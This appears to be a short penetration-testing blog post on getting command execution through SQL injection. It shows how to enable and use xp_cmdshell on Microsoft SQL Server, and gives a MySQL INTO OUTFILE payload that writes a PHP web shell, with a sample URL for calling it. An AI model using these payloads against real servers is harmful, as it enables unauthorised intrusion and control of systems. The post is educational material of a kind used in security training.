Published on March 26, 2025
Gaining code execution through SQL injection requires adapting to the target database engine. Let’s explore two methods: one for Microsoft SQL Server and one for MySQL.
The xp_cmdshell function allows command execution but is disabled by default. If permissions allow, we can enable it:
SQL> EXECUTE sp_configure 'show advanced options', 1;
SQL> RECONFIGURE;
SQL> EXECUTE sp_configure 'xp_cmdshell', 1;
SQL> RECONFIGURE;Once enabled, commands can be executed directly:
SQL> EXECUTE xp_cmdshell 'whoami';
This confirms execution as nt service\mssql$sqlexpress. At this point, upgrading to a full reverse shell is possible.
MySQL lacks built-in command execution, but we can write a web shell using the SELECT INTO OUTFILE trick:
' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null
INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //
This writes a basic PHP web shell. Access it via browser and pass commands using the cmd parameter:
http://target/tmp/webshell.php?cmd=id
Successful execution confirms control, typically as the www-data user.